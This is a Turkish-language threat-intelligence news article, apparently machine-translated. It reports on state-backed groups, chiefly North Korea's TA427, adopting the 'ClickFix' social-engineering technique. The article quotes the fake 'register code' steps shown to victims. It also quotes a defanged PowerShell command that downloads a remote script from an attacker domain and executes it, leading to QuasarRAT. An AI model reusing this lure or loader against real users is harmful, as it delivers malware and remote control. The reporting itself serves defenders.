Güvenlik araştırmacıları, casusluk operasyonlarında “ClickFix” adı verilen nispeten yeni bir sosyal mühendislik tekniğini benimsemeye başladıkça, siber tehdit ortamında ilgili bir eğilim belirlediler.
Mart 2024’ün başlarında siber suçlu çevrelerde ortaya çıkan teknik, geleneksel güvenlik kontrollerini atlamadaki etkinliği nedeniyle ileri süren tehdit (APT) grupları arasında hızla popülerlik kazanmıştır.
ClickFix, kurbanları makinelerinde kopyalama, yapıştırma ve kötü niyetli komutlar çalıştırma talimatları ile diyalog kutuları kullanan yaratıcı bir sosyal mühendislik yaklaşımını temsil eder.
.png
)
Tekniği özellikle sinsi yapan şey, çift yönlü yaklaşımıdır: ilk olarak kullanıcıları bir sorun olarak sahte bir hata mesajı sunmak, daha sonra bir çözüm olarak işletim sisteminden sözde talimatlar için yetkili bir uyarı sağlamak.
Proofpoint araştırmacıları, 2024’ün sonlarından 2025’in başlarına kadar nispeten kısa bir üç aylık bir süre boyunca Kuzey Kore, İran ve Rusya’dan devlet destekli tehdit aktörlerinin ClickFix tekniğini rutin casusluk kampanyalarına dahil ettiğini belirtti.
Birden fazla ulus devlet aktöründeki bu hızlı benimsenme, APT gruplarının taktiklerini nasıl geliştirdikleri konusunda önemli bir evrime işaret etmektedir.
ClickFix’in siber suçtan devlet destekli kullanıma geçişi, mevcut enfeksiyon zincirlerindeki geleneksel kurulum ve yürütme aşamalarını, insan etkileşimini güvenlik önlemlerini atlamak için kullanan bir yöntemle etkili bir şekilde değiştirdiği için tehdit ortamında önemli bir değişimi temsil eder.
Artan popülaritesine rağmen, araştırmacılar çoğu grubun standart operasyonel taktiklerine dönmeden önce sınırlı kampanyalarda tekniği denediğini gözlemlediler.
Kuzey Kore’ye bağlı bir tehdit oyuncusu olan TA427 ile ilişkili kampanyalarda (Kissuky veya Emerald Squet olarak da bilinir) özellikle sofistike bir uygulama gözlenmiştir. Grup, Japon diplomatik personel olarak maskelenerek Kuzey Kore işleri üzerinde çalışan bireyleri hedef aldı.
.webp)
Benign iletişim yoluyla ilk temas kurduktan ve güven oluşturduktan sonra, saldırganlar kurbanları güvenli bir belge paylaşım platformu taklit eden saldırgan kontrollü bir web sitesine yönlendirdi.
ClickFix enfeksiyon mekanizması
Bu saldırılarda kullanılan enfeksiyon mekanizması, yürütmede basitliği korurken önemli teknik karmaşıklık göstermektedir.
Mağdurlar kötü niyetli açılış sayfasını ziyaret ettiklerinde, cihazlarını “kaydetmek” için talimatlar içeren bir kayıt diyalog kutusu sunuldu.
Diyalog, kullanıcıları görünüşte zararsız eylemler gerçekleştirmeye itti:-
1. Copy the register code: JPEMB-76FR3-9G87H-7ZC56
2. Press "Windows key + R" to open Run
3. Press "Ctrl+V"
4. Press "Enter"Mağdurların fark etmediği şey, kopyalanan “Kayıt Kodu” nun aslında gizlenmiş bir PowerShell komutu içerdiğiydi:-
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -
OutFile
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw;
iex
$C;Yürütüldüğünde, bu komut sessizce indirildi ve kalıcılık için planlanan görevler oluştururken meşruiyet yanılsamasını korumak için bir tuzak PDF belgesi görüntüleyen ek PowerShell komut dosyaları çalıştırdı.
TA427’nin davasındaki son yük, saldırganlara tehlikeye atılan sistem üzerinde tam kontrol sağlayan uzaktan erişim Truva atı olan Quasarrat’dı.
.webp)
İran grubu TA450 (Muddywater olarak da bilinir) ve Rus tehdit aktörleri tarafından yapılan kampanyalarda da benzer teknikler gözlenmiştir, her biri mevcut taktik ve altyapılarına tıklamaya uyarlanmıştır.
Halen bu devlet destekli gruplar tarafından deneysel kullanımı ile sınırlı olsa da, hem siber suç hem de casusluk kampanyalarında tıklama fix’in artan popülaritesi, tekniğin tehdit aktörleri sosyal mühendislik yaklaşımlarını geliştirmeye devam ettikçe daha geniş bir şekilde benimseneceğini göstermektedir.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy